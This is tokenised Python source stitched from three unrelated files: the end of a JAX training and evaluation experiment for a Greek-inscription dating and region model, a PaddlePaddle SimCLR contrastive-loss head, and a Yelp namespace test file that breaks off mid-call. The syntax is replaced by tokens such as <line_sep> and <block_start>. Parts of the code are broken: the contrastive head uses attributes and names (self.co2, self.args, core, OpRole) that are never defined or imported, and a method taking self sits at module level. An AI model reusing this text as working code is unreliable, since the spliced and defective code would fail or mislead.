self._train_input=<none><line_sep>self._eval_input=<none><line_sep># Forward and update functions. 
self.forward=Model(**self.config.model)<line_sep>self._update_func=jax.pmap(self._update_func axis_name='i' donate_argnums=(0 1))<line_sep>self._learning_rate_fn=functools.partial(linear_warmup_and_sqrt_decay max_lr=self.config.optimizer.kwargs.learning_rate warmup_steps=self.config.optimizer.warmup)<line_sep>self._opt_init,self._opt_update=self.optimizer()<if_stmt>'use_jit'<in>self.config.evaluation<and>self.config.evaluation.use_jit<block_start>self._eval_batch=jax.jit(self._eval_batch)<block_end># Create alphabet alphabet_kwargs=dict(self.config.alphabet)<line_sep>wordlist_path=alphabet_kwargs.pop('wordlist_path')<with_stmt>open(wordlist_path 'r')<as>f<block_start>self._alphabet=GreekAlphabet(wordlist_file=f **alphabet_kwargs)<block_end># Create region mapping self._region_map={'main':<none> 'sub':<none>}<if_stmt>self.config.dataset.region_main_path<block_start><with_stmt>open(self.config.dataset.region_main_path 'r')<as>f<block_start>self._region_map['main']=load_region_maps(f)<block_end><block_end><if_stmt>self.config.dataset.region_sub_path<block_start><with_stmt>open(self.config.dataset.region_sub_path 'r')<as>f<block_start>self._region_map['sub']=load_region_maps(f)<block_end><block_end><block_end><def_stmt>optimizer self<block_start>config_opt=self.config.optimizer<line_sep>kwargs=config_opt.kwargs.to_dict()<line_sep>kwargs['learning_rate']=self._learning_rate_fn<line_sep>opt=getattr(optax config_opt.name)(**kwargs)<if_stmt>hasattr(config_opt 'clip_adaptive')<and>config_opt.clip_adaptive<block_start><if_stmt>config_opt.clip_level<g>0.<block_start>opt=optax.chain(adaptive_grad_clip(config_opt.clip_level) opt)<block_end><block_end><elif_stmt>config_opt.clip_level<g>0.<block_start>opt=optax.chain(optax.clip_by_global_norm(config_opt.clip_level) opt)<block_end><return>opt<block_end># _ _ # | |_ _ __ __ _(_)_ __ # | __| '__/ _` | | '_ \ # | |_| | | (_| | | | | | # \__|_| \__,_|_|_| |_| # <def_stmt>step self global_step rng **unused_args<block_start>"""See base class."""<if_stmt>self._train_input<is><none><block_start>self._initialize_train(rng)<block_end>batch=next(self._train_input)<line_sep>(self._params self._opt_state scalars)=(self._update_func(self._params self._opt_state global_step batch rng))<line_sep>scalars=jl_utils.get_first(scalars)<line_sep><return>scalars<block_end><def_stmt>_initialize_train self rng# Check we haven't already restored params <block_start><if_stmt>self._params<is><none><block_start>logging.info('Initializing parameters rather than restoring from checkpoint.')<line_sep>batch=next(self._build_train_input())<line_sep>rng=jl_utils.get_first(rng)<line_sep>params_rng,dropout_rng=jax.random.split(rng)<line_sep>params_rng=jl_utils.bcast_local_devices(params_rng)<line_sep>dropout_rng=jl_utils.bcast_local_devices(dropout_rng)<line_sep>init_net=jax.pmap(functools.partial(self.forward.init is_training=<true>))<line_sep>self._params=init_net({'params':params_rng 'dropout':dropout_rng} text_char=batch['text_char'] text_word=batch['text_word'])<line_sep>init_opt=jax.pmap(self._opt_init)<line_sep>self._opt_state=init_opt(self._params)<line_sep>self._train_input=jl_utils.py_prefetch(self._build_train_input)<line_sep>self._train_input=jl_utils.double_buffer_on_gpu(self._train_input)<block_end><block_end><def_stmt>_build_train_input self<block_start>"""See base class."""<line_sep>num_devices=jax.device_count()<line_sep>global_batch_size=self.config.training.batch_size<line_sep>per_device_batch_size,ragged=divmod(global_batch_size 
num_devices)<line_sep>logging.info('num_devices: %d, per_device_batch_size: %d, global_batch_size: %d' num_devices per_device_batch_size global_batch_size)<if_stmt>ragged<block_start><raise>ValueError(f'Global batch size {global_batch_size} must be divisible by '<concat>f'num devices {num_devices}')<block_end>config_dataset=self.config.dataset<with_stmt>open(config_dataset.dataset_path)<as>dataset_file<block_start>ds=dataloader.loader_tf(per_device_batch_size config_dataset self._region_map alphabet=self._alphabet dataset_file=dataset_file mode='train')<block_end>ds=ds.batch(jax.local_device_count())<line_sep><return>iter(tfds.as_numpy(ds))<block_end><def_stmt>_loss_fn self params batch global_step rng<block_start>text_char=batch['text_char']<line_sep>text_word=batch['text_word']<line_sep>text_unmasked=batch['text_unmasked']<line_sep>text_mask=batch['text_mask']<line_sep>next_sentence_mask=batch['next_sentence_mask']<line_sep>next_sentence_label=batch['next_sentence_label']<line_sep>subregion=batch['region_sub_id']<line_sep>date_min=batch['date_min']<line_sep>date_max=batch['date_max']<line_sep>date_dist=batch['date_dist']<line_sep>date_available=batch['date_available']<line_sep>eps=1e-6<line_sep>(date_pred subregion_logits mask_logits nsp_logits)=self.forward.apply(params text_char=text_char text_word=text_word text_char_onehot=<none> text_word_onehot=<none> is_training=<true> rngs={'dropout':rng})<line_sep>date_loss=0.<line_sep>subregion_loss=0.<line_sep>subregion_accuracy=0.<line_sep>mask_loss=0.<line_sep>mask_accuracy=0.<line_sep>nsp_loss=0.<line_sep>nsp_accuracy=0.<line_sep># Date loss <if_stmt>self.config.loss.date.enabled<block_start><if_stmt>self.config.loss.date.label_smoothing<g>0<block_start>date_dist_prob=jnp.exp(date_dist)# logprob to prob date_dist_prob_smooth=date_dist_prob<times>jax.random.uniform(rng shape=date_dist_prob.shape dtype=date_dist_prob.dtype minval=1-self.config.loss.date.label_smoothing maxval=1+self.config.loss.date.label_smoothing)<line_sep>date_dist_prob_smooth<augdiv>date_dist_prob_smooth.sum(axis=-1)[: jnp.newaxis]<line_sep>date_dist_prob_smooth=jnp.clip(date_dist_prob_smooth 1e-6 1)<line_sep>date_dist=jnp.log(date_dist_prob_smooth)<block_end>date_loss=0.<if_stmt>'l1'<in>self.config.loss.date.type.split('+')<block_start>date_pred_x=jnp.arange(self.config.dataset.date_min+self.config.dataset.date_interval/2 self.config.dataset.date_max+self.config.dataset.date_interval/2 self.config.dataset.date_interval).reshape(-1 1)<line_sep>date_pred_val=jnp.dot(jax.nn.softmax(date_pred axis=-1) date_pred_x)<line_sep>date_loss_l1_=jax.vmap(date_loss_l1)(date_pred_val date_min date_max date_available)<line_sep>jnp.nan_to_num(date_loss_l1_ copy=<false>)<line_sep>date_loss<augadd>(jnp.mean(date_loss_l1_ axis=0)<times>self.config.loss.date.weight_l1)<block_end><if_stmt>'dist'<in>self.config.loss.date.type.split('+')<block_start>date_loss_dist_=categorical_kl_divergence(date_dist date_pred)<line_sep>date_loss_dist_<augmul>date_available<line_sep>jnp.nan_to_num(date_loss_dist_ copy=<false>)<line_sep>date_loss<augadd>(jnp.mean(date_loss_dist_ axis=0)<times>self.config.loss.date.weight_dist)<block_end>date_loss<augmul>linear_weight(global_step self.config.loss.date.step_start self.config.loss.date.step_end)<block_end># Region and subregion loss <if_stmt>self.config.loss.region.enabled<block_start>subregion_loss=jnp.mean(cross_entropy_label_smoothing_loss(subregion_logits subregion label_smoothing=self.config.loss.region.label_smoothing) 
0)<line_sep>jnp.nan_to_num(subregion_loss copy=<false>)<line_sep>subregion_loss<augmul>self.config.loss.region.weight<line_sep>subregion_accuracy=jnp.mean(jnp.argmax(subregion_logits -1)<eq>subregion)<line_sep>w=linear_weight(global_step self.config.loss.region.step_start self.config.loss.region.step_end)<line_sep>subregion_loss<augmul>w<block_end># Mask loss <if_stmt>self.config.loss.mask.enabled<block_start>mask_loss=jnp.sum(cross_entropy_label_smoothing_loss(mask_logits text_unmasked text_mask label_smoothing=self.config.loss.mask.label_smoothing) 1)<line_sep># [B] <assert_stmt>mask_loss.ndim<eq>1<line_sep>jnp.nan_to_num(mask_loss copy=<false>)<line_sep>mask_loss=jnp.mean(mask_loss 0)<times>self.config.loss.mask.weight# [] mask_all_accuracy=(jnp.argmax(mask_logits -1)<eq>text_unmasked).astype(mask_logits.dtype)<line_sep>mask_accuracy=jnp.divide(jnp.sum(jnp.multiply(mask_all_accuracy text_mask.astype(mask_logits.dtype))) jnp.sum(text_mask)+eps)<line_sep>mask_loss<augmul>linear_weight(global_step self.config.loss.mask.step_start self.config.loss.mask.step_end)<block_end># NSP loss <if_stmt>self.config.loss.nsp.enabled<block_start>nsp_loss=jnp.sum(jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits next_sentence_label next_sentence_mask) 1)<line_sep># [B] <assert_stmt>nsp_loss.ndim<eq>1<line_sep>jnp.nan_to_num(nsp_loss copy=<false>)<line_sep>nsp_loss=jnp.mean(nsp_loss 0)<times>self.config.loss.nsp.weight<line_sep>nsp_all_accuracy=(jnp.argmax(nsp_logits -1)<eq>next_sentence_label).astype(nsp_logits.dtype)<line_sep>nsp_accuracy=jnp.divide(jnp.sum(jnp.multiply(nsp_all_accuracy next_sentence_mask.astype(nsp_logits.dtype))) jnp.sum(next_sentence_mask)+eps)<line_sep>nsp_loss<augmul>linear_weight(global_step self.config.loss.nsp.step_start self.config.loss.nsp.step_end)<block_end>loss=date_loss+subregion_loss+mask_loss+nsp_loss<line_sep>scaled_loss=loss/jax.device_count()<line_sep># NOTE: We use scaled_loss for grads and unscaled for logging. <return>scaled_loss (loss date_loss subregion_loss subregion_accuracy mask_loss mask_accuracy nsp_loss nsp_accuracy)<block_end><def_stmt>_update_func self params opt_state global_step batch rng<block_start>"""Applies an update to parameters and returns new state."""<line_sep># This function computes the gradient of the first output of loss_fn and # passes through the other arguments unchanged. grad_loss_fn=jax.grad(self._loss_fn has_aux=<true>)<line_sep>scaled_grads,(loss date_loss subregion_loss subregion_accuracy mask_loss mask_accuracy nsp_loss nsp_accuracy)=grad_loss_fn(params batch global_step rng)<line_sep>scaled_grads=jax.tree_map(jnp.nan_to_num scaled_grads)<line_sep>grads=jl_utils.tree_psum(scaled_grads axis_name='i')<line_sep># Compute and apply updates via our optimizer. learning_rate=self._learning_rate_fn(global_step)<line_sep>updates,opt_state=self._opt_update(grads opt_state params=params)<line_sep>params=optax.apply_updates(params updates)<line_sep># Scalars to log (note: we log the mean across all hosts/devices). 
scalars={'loss/train':loss 'loss/date':date_loss 'loss/subregion':subregion_loss 'loss/mask':mask_loss 'loss/nsp':nsp_loss 'accuracy/subregion':subregion_accuracy 'accuracy/mask':mask_accuracy 'accuracy/nsp':nsp_accuracy 'opt/learning_rate':learning_rate 'opt/grad_norm':optax.global_norm(grads) 'opt/param_norm':optax.global_norm(params) }<line_sep>scalars=jax.lax.pmean(scalars axis_name='i')<line_sep><return>params opt_state scalars<block_end># _ # _____ ____ _| | # / _ \ \ / / _` | | # | __/\ V / (_| | | # \___| \_/ \__,_|_| # <def_stmt>evaluate self global_step rng **unused_kwargs<block_start>"""See base class."""<if_stmt>self._eval_input<is><none><block_start>self._initialize_eval()<block_end>global_step=np.array(jl_utils.get_first(global_step))<line_sep>summary,outputs=self._eval_epoch(jl_utils.get_first(rng))<for_stmt>k,v summary.items()<block_start>summary[k]=np.array(v)<block_end>score=summary['score/eval']<line_sep>logging.info('[Step %d] eval_score=%.2f' global_step score)<line_sep># Log outputs checkpoint_dir=jl_utils.get_checkpoint_dir(FLAGS.config jax.process_index())<line_sep>outputs_path=os.path.join(checkpoint_dir 'best_outputs.pkl.bz2')<line_sep>score_path=os.path.join(checkpoint_dir 'best_score.txt')<line_sep>model_log_path=os.path.join(checkpoint_dir 'model_log')<line_sep>best_model_log_path=os.path.join(checkpoint_dir 'best_model_log')<line_sep># Check for preexisting outputs best_score=<none><line_sep>best_step=<none><if_stmt>os.path.exists(score_path)<block_start><with_stmt>open(score_path 'r')<as>f<block_start>tok=f.read().strip().split(' ')<line_sep>best_step=int(tok[0])<line_sep>best_score=float(tok[1])<block_end><block_end># Store outputs if score is better <if_stmt>best_score<is><none><or>(score<g>best_score<and>global_step<g>best_step)<block_start>best_score=score<with_stmt>open(score_path 'w')<as>f<block_start>f.write(f'{global_step} {best_score}')<block_end><with_stmt>open(outputs_path 'wb')<as>f<block_start>outputs_pkl=pickle.dumps(outputs protocol=2)<line_sep>outputs_pkl_bz2=bz2.compress(outputs_pkl)<line_sep>f.write(outputs_pkl_bz2)<block_end><if_stmt>self.config.evaluation.store_model_log<block_start><if_stmt>os.path.isdir(best_model_log_path)<block_start>map(os.remove glob.glob(best_model_log_path+'/*'))<block_end><else_stmt><block_start>os.makedirs(best_model_log_path)<block_end>distutils.dir_util.copy_tree(model_log_path best_model_log_path)<block_end>logging.info('[Step %d] Writing eval outputs: %s.' 
global_step outputs_path)<block_end># Log best score summary['score/eval_best']=best_score<line_sep><return>summary<block_end><def_stmt>_initialize_eval self<block_start>self._eval_input=jl_utils.py_prefetch(self._build_eval_input)<block_end><def_stmt>_build_eval_input self<block_start>"""Builds the evaluation input pipeline."""<line_sep>config_dataset=self.config.dataset<with_stmt>open(config_dataset.dataset_path)<as>dataset_file<block_start>ds=dataloader.loader_tf(self.config.evaluation.batch_size config_dataset self._region_map alphabet=self._alphabet dataset_file=dataset_file mode=self.config.evaluation.mode)<block_end><return>iter(tfds.as_numpy(ds))<block_end><def_stmt>_eval_batch self params batch rng<block_start>"""Evaluates a batch."""<line_sep>phi_id=batch['id']<line_sep>text_char=batch['text_char']<line_sep>text_word=batch['text_word']<line_sep>text_unmasked=batch['text_unmasked']<line_sep>text_mask=batch['text_mask']<line_sep>next_sentence_mask=batch['next_sentence_mask']<line_sep>next_sentence_label=batch['next_sentence_label']<line_sep>subregion=batch['region_sub_id']<line_sep>date_min=batch['date_min']<line_sep>date_max=batch['date_max']<line_sep>date_dist=batch['date_dist']<line_sep>date_available=batch['date_available']<line_sep># with hlogging.context() as log: (date_pred subregion_logits mask_logits nsp_logits)=self.forward.apply(params text_char=text_char text_word=text_word text_char_onehot=<none> text_word_onehot=<none> is_training=<false> rngs={'dropout':rng})<line_sep># Log model weights model_log={}<line_sep>subregion_loss=0.<line_sep>subregion_accuracy=0.<line_sep>date_loss=0.<line_sep>date_l1_loss=0.<line_sep>nsp_loss=0.<line_sep>nsp_accuracy=0.<line_sep># eps = 1e-6 date_count=0<line_sep>mask_count=0<line_sep>nsp_count=0<line_sep># Date loss <if_stmt>self.config.loss.date.enabled<block_start>date_pred_x=jnp.arange(self.config.dataset.date_min+self.config.dataset.date_interval/2 self.config.dataset.date_max+self.config.dataset.date_interval/2 self.config.dataset.date_interval).reshape(-1 1)<line_sep>date_pred_val=jnp.dot(jax.nn.softmax(date_pred axis=-1) date_pred_x)<line_sep>date_l1_loss=jnp.sum(jax.vmap(date_loss_l1)(date_pred_val date_min date_max date_available) axis=0)<if_stmt>'l1'<in>self.config.loss.date.type.split('+')<block_start>date_loss<augadd>date_l1_loss<times>self.config.loss.date.weight_l1<block_end><if_stmt>'dist'<in>self.config.loss.date.type.split('+')<block_start>date_loss_dist_=categorical_kl_divergence(date_dist date_pred)<line_sep>date_loss_dist_<augmul>date_available<line_sep>date_loss<augadd>(jnp.sum(date_loss_dist_ axis=0)<times>self.config.loss.date.weight_dist)<block_end>date_count=jnp.sum(date_available)<block_end># Region and subregion loss <if_stmt>self.config.loss.region.enabled<block_start>subregion_loss=jnp.sum(cross_entropy_loss(subregion_logits subregion) 0)<line_sep>subregion_loss<augmul>self.config.loss.region.weight<line_sep>subregion_accuracy=jnp.mean(jnp.argmax(subregion_logits -1)<eq>subregion)<block_end># Mask loss <if_stmt>self.config.loss.mask.enabled<block_start>mask_loss=jnp.sum(cross_entropy_label_smoothing_loss(mask_logits text_unmasked text_mask label_smoothing=0) 1)<line_sep># [B] # mask_loss /= jnp.sum(text_mask, axis=1) + eps # [B] <assert_stmt>mask_loss.ndim<eq>1<line_sep>mask_loss=jnp.mean(mask_loss 0)<times>self.config.loss.mask.weight# [] mask_all_accuracy=(jnp.argmax(mask_logits -1)<eq>text_unmasked).astype(mask_logits.dtype)<line_sep>mask_accuracy=jnp.sum(jnp.multiply(mask_all_accuracy 
text_mask.astype(mask_logits.dtype)))<line_sep>mask_count=jnp.sum(text_mask)<block_end># NSP loss <if_stmt>self.config.loss.nsp.enabled<block_start>nsp_loss=jnp.sum(jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits next_sentence_label next_sentence_mask) 1)<line_sep># [B] <assert_stmt>nsp_loss.ndim<eq>1<line_sep>nsp_loss=jnp.sum(nsp_loss 0)<times>self.config.loss.nsp.weight<line_sep>nsp_all_accuracy=(jnp.argmax(nsp_logits -1)<eq>next_sentence_label).astype(nsp_logits.dtype)<line_sep>nsp_accuracy=jnp.sum(jnp.multiply(nsp_all_accuracy next_sentence_mask.astype(nsp_logits.dtype)))<line_sep>nsp_count=jnp.sum(next_sentence_mask)<block_end># Outputs scalars={'score/eval':(mask_accuracy+subregion_accuracy-date_l1_loss<times>0.01) 'loss/eval':mask_loss+date_loss+subregion_loss 'loss/date':date_loss 'loss/date_l1':date_l1_loss 'loss/subregion':subregion_loss 'loss/mask':mask_loss 'loss/nsp':nsp_loss 'count/date':date_count 'count/nsp':nsp_count 'count/mask':mask_count 'accuracy/subregion':subregion_accuracy 'accuracy/mask':mask_accuracy 'accuracy/nsp':nsp_accuracy }<line_sep>outputs={'outputs/id':phi_id 'outputs/date_pred':date_pred.astype('float16') 'outputs/date_min':date_min 'outputs/date_max':date_max 'outputs/date_dist':date_dist.astype('float16') 'outputs/date_available':date_available 'outputs/subregion_logits':subregion_logits.astype('float16') 'outputs/subregion':subregion }<line_sep><return>scalars outputs model_log<block_end><def_stmt>_eval_epoch self rng<block_start>"""Evaluates an epoch."""<line_sep>summary={}<line_sep>outputs={}<line_sep>total_num_sequences=0<line_sep># Prepare directories for storing model log checkpoint_dir=jl_utils.get_checkpoint_dir(FLAGS.config jax.process_index())<line_sep>model_log_path=os.path.join(checkpoint_dir 'model_log')<if_stmt>self.config.evaluation.store_model_log<block_start><if_stmt>os.path.isdir(model_log_path)<block_start>map(os.remove glob.glob(model_log_path+'/*'))<block_end><else_stmt><block_start>os.makedirs(model_log_path)<block_end><block_end># Checkpoints broadcast for each local device params=jl_utils.get_first(self._params)<line_sep># Model log buffer initialisation model_log_buffer=[]<def_stmt>_flush_model_log_buffer model_log_buffer<block_start>"""Writes model log to bz2 pickle files."""<while_stmt>model_log_buffer<block_start>model_log_batch_path,model_log_pkl_bz2=model_log_buffer.pop(0)<with_stmt>open(model_log_batch_path 'wb')<as>f<block_start>f.write(model_log_pkl_bz2)<block_end><block_end><block_end># Converting to numpy here allows us to reset the generator <for_stmt>batch self._eval_input()# Make sure that the input has batch_dim=1 <block_start><assert_stmt>batch['text_char'].shape[0]<eq>1<line_sep>summary_batch,outputs_batch,model_log_batch=self._eval_batch(params batch rng)<line_sep># Append batch values to dictionary <for_stmt>k,v summary_batch.items()<block_start>summary[k]=summary.get(k 0)+v<block_end><for_stmt>k,v outputs_batch.items()<block_start>outputs.setdefault(k []).append(v)<block_end>total_num_sequences<augadd>self.config.evaluation.batch_size<line_sep># Store model log per batch <if_stmt>self.config.evaluation.store_model_log# Append to buffer <block_start>model_log_batch_path=os.path.join(model_log_path str(outputs_batch['outputs/id'][0])+'.pkl.bz2')<line_sep>model_log_pkl=pickle.dumps(model_log_batch protocol=2)<line_sep>model_log_pkl_bz2=bz2.compress(model_log_pkl)<line_sep>model_log_buffer<augadd>[(model_log_batch_path model_log_pkl_bz2)]<line_sep># Flush model log buffer 
<if_stmt>(len(model_log_buffer)%self.config.evaluation.store_model_log_steps<eq>0)<block_start>_flush_model_log_buffer(model_log_buffer)<block_end><block_end><block_end># Flush remaining model log buffer <if_stmt>self.config.evaluation.store_model_log<block_start>_flush_model_log_buffer(model_log_buffer)<block_end># Normalise and concatenate summary['loss/date']<augdiv>summary['count/date']<line_sep>summary['loss/date_l1']<augdiv>summary['count/date']<line_sep>summary['loss/mask']<augdiv>summary['count/mask']<line_sep>summary['accuracy/mask']<augdiv>summary['count/mask']<line_sep>summary['loss/nsp']<augdiv>summary['count/nsp']<line_sep>summary['accuracy/nsp']<augdiv>summary['count/nsp']<line_sep>summary['loss/subregion']<augdiv>total_num_sequences<line_sep>summary['accuracy/subregion']<augdiv>total_num_sequences<line_sep>summary['score/eval']=(summary['accuracy/mask']+summary['accuracy/subregion']-summary['loss/date_l1']<times>0.01)<line_sep>summary['loss/eval']=(summary['loss/mask']+summary['loss/date']+summary['loss/subregion'])<for_stmt>k,v outputs.items()<block_start>outputs[k]=np.concatenate(v axis=0)<block_end><return>summary outputs<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>flags.mark_flag_as_required('config')<line_sep>app.run(functools.partial(platform.main Experiment))<block_end>
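# --- Hedged usage note (editor addition): an Experiment wired through
# app.run(functools.partial(platform.main Experiment)) as above is normally launched from the
# command line with the required config flag, e.g. `python train.py --config=configs/ithaca.py`.
# The script and config file names are illustrative assumptions; only the fact that --config is
# required is taken from flags.mark_flag_as_required('config') above. ---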
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>paddle<import_stmt>paddle.nn<as>nn<import_from_stmt>.builder HEADS<import_stmt>paddle.nn.functional<as>F<import_stmt>paddle.fluid.layers<as>layers<line_sep>LARGE_NUM=1e9<line_sep>@HEADS.register()<class_stmt>SimCLRContrastiveHead(nn.Layer)<block_start>"""Head for contrastive learning. Args: temperature (float): The temperature hyper-parameter that controls the concentration level of the distribution. Default: 0.5. """<def_stmt>__init__ self temperature=0.5 return_accuracy=<true> multi_rank=<false><block_start>super(SimCLRContrastiveHead self).__init__()<line_sep>self.criterion=nn.CrossEntropyLoss()<line_sep>self.temperature=temperature<line_sep>self.return_accuracy=return_accuracy<line_sep>self.multi_rank=multi_rank<block_end><def_stmt>forward self pos neg<block_start>"""Forward head. Args: pos (Tensor): NxC projected features of the first augmented view. neg (Tensor): NxC projected features of the second augmented view. Returns: dict[str, Tensor]: A dictionary of loss components. """<line_sep>hidden1,hidden2=pos neg<line_sep>batch_size=pos.shape[0]<line_sep># Gather hidden1/hidden2 across replicas and create local labels. <if_stmt>self.multi_rank<is><true><block_start>hidden1_large=self.add_allgather(hidden1 "hidden1"+str(self.co2))<line_sep>hidden2_large=self.add_allgather(hidden2 "hidden2"+str(self.co2))<line_sep>hidden1_large=paddle.reshape(hidden1_large [-1 hidden1_large.shape[-1]])<line_sep>hidden2_large=paddle.reshape(hidden2_large [-1 hidden2_large.shape[-1]])<line_sep>enlarged_batch_size=paddle.shape(hidden1_large)[0]<line_sep>trainer_id=self.args.trainer_id<line_sep>labels_idx=paddle.arange(0 batch_size 1 "int32")+trainer_id<times>batch_size<line_sep>labels=F.one_hot(paddle.reshape(labels_idx [batch_size]) enlarged_batch_size<times>2)<line_sep>masks=F.one_hot(paddle.reshape(labels_idx [batch_size]) enlarged_batch_size)<block_end><else_stmt><block_start>hidden1_large=hidden1<line_sep>hidden2_large=hidden2<line_sep>labels=F.one_hot(paddle.reshape(paddle.arange(0 batch_size 1 "int32") [batch_size]) batch_size<times>2)<line_sep>masks=F.one_hot(paddle.reshape(paddle.arange(0 batch_size 1 "int32") [batch_size]) batch_size)<block_end>logits_aa=paddle.matmul(hidden1 hidden1_large transpose_y=<true>)/self.temperature<line_sep>logits_aa=logits_aa-masks<times>LARGE_NUM<line_sep>logits_bb=paddle.matmul(hidden2 hidden2_large transpose_y=<true>)/self.temperature<line_sep>logits_bb=logits_bb-masks<times>LARGE_NUM<line_sep>logits_ab=paddle.matmul(hidden1 hidden2_large transpose_y=<true>)/self.temperature<line_sep>logits_ba=paddle.matmul(hidden2 hidden1_large transpose_y=<true>)/self.temperature<line_sep>loss_a=paddle.nn.functional.softmax_with_cross_entropy(paddle.concat([logits_ab logits_aa] 1) labels soft_label=<true>)<line_sep>loss_b=paddle.nn.functional.softmax_with_cross_entropy(paddle.concat([logits_ba logits_bb] 1) labels 
soft_label=<true>)<line_sep>contrast_loss=loss_a+loss_b<line_sep>logits_ab_co2=logits_ab-masks<times>LARGE_NUM<line_sep>logits_ba_co2=logits_ba-masks<times>LARGE_NUM<line_sep>logit_a=paddle.concat([logits_aa logits_ab_co2] 1)<line_sep>logit_b=paddle.concat([logits_ba_co2 logits_bb] 1)<line_sep>log_a=paddle.nn.functional.log_softmax(logit_a)<line_sep>log_b=paddle.nn.functional.log_softmax(logit_b)<line_sep>a=paddle.nn.functional.softmax(logit_a)<line_sep>b=paddle.nn.functional.softmax(logit_b)<line_sep>kl_1=paddle.nn.functional.kl_div(log_a b reduction='batchmean')<line_sep>kl_2=paddle.nn.functional.kl_div(log_b a reduction='batchmean')<line_sep>co2_loss=1<times>(kl_1+kl_2)<line_sep>total_contrast_loss=contrast_loss+3<times>co2_loss<line_sep>loss=layers.reduce_mean(total_contrast_loss)<line_sep>contrastive_label=paddle.unsqueeze(paddle.argmax(labels axis=1) 1)<line_sep>acc1=layers.accuracy(input=logits_ab label=contrastive_label)<line_sep>outputs=dict()<line_sep>outputs['loss']=loss<line_sep>outputs['acc1']=acc1<line_sep><return>outputs<block_end><block_end><def_stmt>accuracy output target topk=(1 )<block_start>"""Computes the accuracy over the k top predictions for the specified values of k"""<with_stmt>paddle.no_grad()<block_start>maxk=max(topk)<line_sep>batch_size=target.shape[0]<line_sep>_,pred=output.topk(maxk 1 <true> <true>)<line_sep>pred=pred.t()<line_sep>correct=paddle.cast(pred<eq>target.reshape([1 -1]).expand_as(pred) 'float32')<line_sep>res=[]<for_stmt>k topk<block_start>correct_k=correct[:k].reshape([-1]).sum(0 keepdim=<true>)<line_sep>res.append(correct_k<times>100.0/batch_size)<block_end><return>res<block_end><block_end><def_stmt>add_allgather self hidden name=""<block_start>block=self._train_program.global_block()<line_sep>hidden_large=block.create_var(name=name shape=[self.args.trainer_num]+list(hidden.shape) persistable=<false> dtype=core.VarDesc.VarType.FP32)<line_sep>op_len=len(list(enumerate(block.ops)))<line_sep>op_maker=core.op_proto_and_checker_maker<line_sep>self.op_role_key=op_maker.kOpRoleAttrName()<line_sep>block._insert_op(op_len type='c_allgather' inputs={'X':hidden} outputs={'Out':hidden_large} attrs={'nranks':self.args.trainer_num self.op_role_key:OpRole.Forward "use_calc_stream":<true>})<line_sep><return>hidden_large<block_end>
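# --- Hedged usage sketch (editor addition): exercises the single-process (multi_rank=False)
# path of SimCLRContrastiveHead above on random projections. The batch size, feature dimension
# and the use of paddle.randn / F.normalize are illustrative assumptions; the module-level
# imports of paddle and F from the file above are reused. ---
<if_stmt>__name__<eq>'__main__'<block_start>head=SimCLRContrastiveHead(temperature=0.5 multi_rank=<false>)<line_sep># Two L2-normalised views of the same batch, each of shape [N, C].
z1=F.normalize(paddle.randn([8 128]) axis=1)<line_sep>z2=F.normalize(paddle.randn([8 128]) axis=1)<line_sep>outputs=head(z1 z2)<line_sep>print(outputs['loss'] outputs['acc1'])<block_end>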
# -*- coding: utf-8 -*- # Copyright 2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_future_stmt> absolute_import<import_from_future_stmt> unicode_literals<import_stmt>pytest<import_from_stmt>data_pipeline._namespace_util DBSourcedNamespace<class_stmt>TestDBSourcedtNamespace(object)<block_start><def_stmt>test_simple self<block_start>name="refresh_primary.yelp"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp")<block_end><def_stmt>test_main_cluster self<block_start>name="main.database"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="main" expected_database="database")<block_end><def_stmt>test_environment self<block_start>name="main.refresh_primary.yelp"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp" expected_environment="main")<block_end><def_stmt>test_tranformers self<block_start>name="dev.refresh_primary.yelp.heartbeat.yelp-main_transformed"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp" expected_environment="dev" expected_suffixes=["heartbeat" "yelp-main_transformed"])<block_end><def_stmt>test_fail_missing self<block_start>self._assert_failure("yelp" error_substr="not enough sections")<line_sep>self._assert_failure("refresh_primary" error_substr="not enough sections")<block_end><def_stmt>test_fail_invalid_chars self<block_start>self._assert_failure("^refresh_primary.yelp" error_substr="must contain at least")<line_sep>self._assert_failure("fadjskl;.fjd" error_substr="must contain at least")<line_sep>self._assert_failure("______.______" error_substr="must contain at least")<line_sep>self._assert_failure("refresh_primary..yelp" error_substr="must contain at least")<block_end><def_stmt>test_guarantees self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_cluster="main") expected_name=name expected_cluster="main" expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_db self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_database="database") expected_name=name expected_cluster="main" expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_transformer self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_suffixes=["transformer"]) expected_name=name expected_cluster="main" 
